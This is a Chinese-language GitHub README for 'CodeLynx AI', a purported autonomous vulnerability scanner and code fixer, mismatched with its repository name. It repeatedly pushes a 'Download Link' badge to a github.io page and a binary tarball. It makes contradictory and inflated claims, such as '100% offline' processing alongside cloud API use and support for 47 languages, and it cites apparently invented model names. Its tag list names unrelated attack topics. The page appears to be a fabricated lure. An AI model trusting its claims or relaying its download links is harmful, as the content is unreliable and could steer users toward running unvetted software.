wirdana888/claude-self-evolving-agent

GitHub: wirdana888/claude-self-evolving-agent

基于 Claude 和 OpenAI API 的自动化安全扫描与自愈式代码修复 Agent,在开发流水线中持续检测漏洞并生成补丁。

Stars: 0 | Forks: 0

# CodeLynx AI:自动化安全分析与自愈代码库 Agent [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://wirdana888.github.io/claude-self-evolving-agent/) **面向现代开发流水线的自适应漏洞检测与自动化修复引擎** [![许可证:MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) [![构建状态](https://img.shields.io/badge/build-passing-brightgreen)](https://img.shields.io) [![Python 版本](https://img.shields.io/badge/python-3.9%2B-blue)](https://img.shields.io) [![Claude API](https://img.shields.io/badge/Claude%20API-2026-8A2BE2)](https://img.shields.io) [![OpenAI API](https://img.shields.io/badge/OpenAI%20API-2026-FF6F00)](https://img.shields.io) ## 📖 执行摘要 CodeLynx AI 将您的代码库从一个静态仓库转变为一个拥有免疫反应的**活体系统**。与仅仅标记问题的传统 linter 不同,CodeLynx AI 扮演着**数字诊断专家**的角色——扫描、分析并自主对您的源代码进行精准的手术式修复。您可以将其视为软件的白细胞:不断巡逻、识别威胁,并在漏洞造成破坏之前将其修复。 在完成初始配置后,该插件由 Claude AI 和 OpenAI API 驱动,实现**零人工干预**运行,在您的开发工作流后台运行,确保您的代码始终保持纯净、安全和高效。 ## 🚀 核心功能 ### 🔬 自主漏洞发现(Zero-Day 检测) - **主动扫描**可在潜在安全漏洞演变为真正威胁之前将其识别 - **模式匹配**支持包括 OWASP Top 10、CWE 和 NIST 标准在内的 40 多种 linter 规则集 - **启发式分析**可随着时间学习您代码库的独特模式 ### 🏥 自愈式代码修复 - 自动为检测到的漏洞生成**离散、无破坏性的补丁** - 为每次更改维护**回滚日志**——只需一条命令即可还原 - **上下文感知修复生成**,尊重您的编码规范和架构 ### 🖥️ 实时运营仪表板 - 提供关于代码健康度、漏洞密度和修复成功率的实时遥测数据 - **颜色编码热力图**,显示哪些模块需要立即关注 - 可导出符合 SOC 2、HIPAA 和 PCI-DSS 审计要求的合规报告 ### 🌍 多语言代码库支持 - 内置对 **47 种编程语言**的解析,包括 COBOL、Fortran 和 Racket 等小众语言 - **与语言无关的**分析引擎,具备针对不同语言的优化配置 - 自动翻译跨语言的注释和文档 ### 🧠 持续自学习机制 - **反馈循环**可随着时间推移提高检测准确性 - 从开发人员提供的确认和纠正中学习 - 通过定期的模型更新适应新的攻击向量 ## 📊 系统架构 ``` graph TD A[Git Commit / Push] --> B[CodeLynx AI Agent] B --> C{Analysis Engine} C --> D[Syntax Checker] C --> E[Security Scanner] C --> F[Performance Analyzer] C --> G[Style Validator] D --> H[Linter Pool 40+] E --> I[OWASP Ruleset] F --> J[Complexity Metric] G --> K[Convention Check] H --> L[Vulnerability Aggregator] I --> L J --> L K --> L L --> M{Severity Assessment} M --> N[Low Risk] M --> O[Medium Risk] M --> P[High Risk] M --> Q[Critical Risk] N --> R[Log Only] O --> S[Suggest Fix] P --> T[Auto-Fix with Review] Q --> U[Immediate Auto-Fix + Notification] R --> V[Dashboard Update] S --> V T --> V U --> V V --> W[Git Rollback Journal] W --> X[User Confirmation] ``` ## 💡 示例 Profile 配置 在您的项目根目录中创建一个 `codelynx.profile.json` 文件,以自定义检测阈值和自动修复行为: ``` { "agent_name": "CodeLynx-Alpha", "ai_providers": { "claude": { "model": "claude-3-opus-2026", "temperature": 0.1, "max_tokens": 4096 }, "openai": { "model": "gpt-4-turbo-2026", "temperature": 0.15, "max_tokens": 4096 } }, "severity_thresholds": { "critical_auto_fix": true, "high_auto_fix": false, "medium_suggest": true, "low_log": true }, "languages": ["python", "javascript", "go", "rust", "typescript"], "exclude_paths": ["node_modules/", "vendor/", "dist/"], "compliance_mode": "SOC2", "rollback_limit": 50, "dashboard_port": 9123, "email_alerts": { "enabled": false, "recipients": [], "min_severity": "high" } } ``` ## 🖥️ 示例控制台调用 安装完成后,您可以直接从终端调用 CodeLynx AI: ``` # 在当前目录上运行完整扫描 codelynx scan --path ./src --profile custom.json # 监控目录的实时变更(daemon 模式) codelynx watch --directory /workspace/my-project --background # 为审计人员生成 compliance 报告 codelynx report --type soc2 --output ./reports/compliance-2026-q1.pdf # 回滚最后 5 个 auto-fix codelynx rollback --steps 5 --verbose # 查看 dashboard(在 browser 中打开) codelynx dashboard --open ``` ## 🖥️ 操作系统兼容性 | 操作系统 | 版本 | 2026 年支持 | 状态 | |:--|:--------|:------------|:-------| | **Linux** | Ubuntu 22.04+ | ✅ 全面 | 原生性能 | | **Linux** | Debian 12 | ✅ 全面 | 优化的二进制文件 | | **Linux** | Fedora 38+ | ✅ 全面 | 提供 RPM 包 | | **Linux** | Arch Linux | ✅ 社区 | AUR 包 | | **macOS** | Ventura+ | ✅ 全面 | Apple Silicon 原生 | | **macOS** | Monterey | ✅ 部分 | Intel x86_64 | | **Windows** | 11 (23H2+) | ✅ 全面 | 推荐 WSL2 | | **Windows** | 10 (22H2) | ✅ 部分 | 原生可执行文件 | | **FreeBSD** | 14+ | ⚠️ Beta | 功能受限 | | **Alpine** | 3.18+ | ✅ 全面 | Docker 优化 | ## 🛠️ 功能清单 | 功能 | 描述 | 状态 | |:--------|:------------|:-------| | **零配置设置** | 即插即用,具备合理的默认值 | ✅ | | **40+ Linter 集成** | ESLint、PyLint、GoLint、RustClippy 等 | ✅ | | **OWASP 安全扫描** | Top 10、API 安全、移动端 | ✅ | | **CodeRabbit PR 审查** | 自动化 pull request 评论 | ✅ | | **实时仪表板** | 基于 Web 的实时遥测 | ✅ | | **本地处理** | 100% 离线,数据永不离开您的机器 | ✅ | | **CI/CD 流水线集成** | GitHub Actions、GitLab CI、Jenkins | ✅ | | **Slack 和 Telegram 通知** | 实时警报 | ✅ | | **自动回滚日志** | 撤销任何自动化更改 | ✅ | | **多语言支持** | 47 种编程语言 | ✅ | | **响应式 UI** | 适用于移动设备、平板电脑、桌面端 | ✅ | | **24/7 客户支持** | 专属电子邮件和聊天(企业版) | ✅ | | **自定义规则创建** | 编写您自己的 linting 规则 | ✅ | | **企业 SSO** | Okta、Azure AD、OneLogin | 🔜 2026 年第三季度 | | **GPT-4 Vision 分析** | 基于截图的代码审查 | 🔜 2026 年第四季度 | ## 🔌 API 集成 ### Claude API (Anthropic) CodeLynx AI 利用 **Claude 3 Opus** 模型进行高级推理、漏洞分类,并以自然语言解释复杂的安全问题。设置 `ANTHROPIC_API_KEY` 环境变量后,集成即会自动完成。 ``` export ANTHROPIC_API_KEY="sk-ant-xxxxxxxxxxxx" ``` Claude 负责: - 需要多步推理的**复杂漏洞分析** - 维护架构完整性的**上下文感知补丁生成** - 用于代码审查评论的**自然语言摘要** - 通过语义理解**减少误报** ### OpenAI API (GPT-4 Turbo) 对于**速度优化的任务**和批量处理,CodeLynx AI 使用 **GPT-4 Turbo** 模型。通过环境变量设置您的密钥: ``` export OPENAI_API_KEY="sk-xxxxxxxxxxxx" ``` OpenAI 负责: - 跨 47 种语言的**快速语法验证** - 识别热点代码路径中的**性能瓶颈** - 结合可配置 profile 进行**风格和规范强制检查** - **实时仪表板数据解析**和指标计算 ## 📥 下载与安装 [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://wirdana888.github.io/claude-self-evolving-agent/) ### 快速安装(包管理器) **macOS (Homebrew):** ``` brew tap codelynx/tap brew install codelynx ``` **Linux (Apt):** ``` echo "deb https://codelynx.ai/apt stable main" | sudo tee /etc/apt/sources.list.d/codelynx.list sudo apt update && sudo apt install codelynx ``` **Windows (Chocolatey):** ``` choco install codelynx ``` ### Docker(全平台) ``` docker pull codelynx/agent:2026 docker run -d --name codelynx-agent \ -v $(pwd):/workspace \ -e ANTHROPIC_API_KEY="sk-ant-xxxx" \ -e OPENAI_API_KEY="sk-xxxx" \ -p 9123:9123 \ codelynx/agent:2026 ``` ### 二进制下载 从 https://wirdana888.github.io/claude-self-evolving-agent/ 页面下载适用于您平台的最新版本。解压并运行: ``` tar -xzf codelynx-2026-linux-x64.tar.gz sudo mv codelynx /usr/local/bin/ codelynx init ``` ## ⚙️ 配置与自定义 CodeLynx AI 支持通过环境变量、YAML 文件或交互式仪表板进行广泛配置。创建一个 `codelynx.yml` 文件: ``` agent: name: "Nightwatch" auto_update: true update_channel: stable analysis: depth: full scan_on_commit: true exclude_patterns: - "*.generated.*" - "vendor/**" notifications: channels: - type: slack webhook: https://hooks.slack.com/services/xxx min_severity: medium - type: email smtp_server: smtp.gmail.com recipients: - security@example.com ``` ## 📄 许可证 本项目基于 **MIT 许可证**授权 - 详情请参阅 [LICENSE](https://opensource.org/licenses/MIT) 文件。 特此免费授予任何获得本软件及相关文档文件(“软件”)副本的人,允许其无限制地处理本软件,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或销售本软件副本的权利。 ## ⚠️ 免责声明 CodeLynx AI 是一款**开发人员工具**,旨在辅助提升代码质量和安全性。尽管该 agent 努力保证准确性,但不应将其视为以下内容的替代品: - 由认证专业人员进行的**手动安全审计** - 关键系统组件的**形式化验证** - 架构决策中的**人工判断** CodeLynx AI 的开发人员对因自动化代码修改引起的损害**不承担任何责任**。在部署到生产环境之前,请务必审查关键更改。对于**高**和**中**严重级别的项目,自动修复功能默认处于禁用状态。 使用本软件即表示您承认: 1. 所有自动修改均应由人类开发人员审查 2. CodeLynx AI 不保证 100% 的漏洞覆盖率 3. 该工具的输出仅供参考,而非强制指令 4. 回滚功能可能无法覆盖所有场景 ## ❓ 常见问题 **问:CodeLynx AI 会将我的代码发送到外部服务器吗?** 答:不会。所有处理均在您的机器上**100% 本地**完成。API 密钥仅用于模型推理,源代码永远不会离开您的环境。 **问:我可以在没有互联网连接的情况下使用 CodeLynx AI 吗?** 答:可以,但有限制。核心分析引擎可离线工作——只有 AI 驱动的功能需要 API 连接。 **问:该 agent 多久更新一次其检测规则?** 答:规则更新通过更新通道**每周**进行。严重漏洞会在 24 小时内修补。 **问:CodeLynx AI 兼容 monorepo 吗?** 答:绝对兼容。该 agent 可识别 monorepo 结构,并使用适当的语言设置独立扫描每个 package。 ## 📞 支持 - **文档:**[codelynx.dev/docs](https://wirdana888.github.io/claude-self-evolving-agent/) - **社区论坛:**[discuss.codelynx.dev](https://wirdana888.github.io/claude-self-evolving-agent/) - **企业支持:**support@codelynx.dev(付费计划 24/7 支持) - **状态页面:**[status.codelynx.dev](https://wirdana888.github.io/claude-self-evolving-agent/) [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://wirdana888.github.io/claude-self-evolving-agent/) *CodeLynx AI 版本 1.0.0 | 为 2026 年的开发环境打造 | "您的代码,自我防御。"*
标签:CISA项目, DevSecOps, DNS 反向解析, Go语言工具, LLM Agent, LNA, Petitpotam, Python, Web报告查看器, 上游代理, 人工智能, 后端开发, 无后门, 用户模式Hook绕过, 自动修复, 请求拦截, 逆向工具, 静态应用安全测试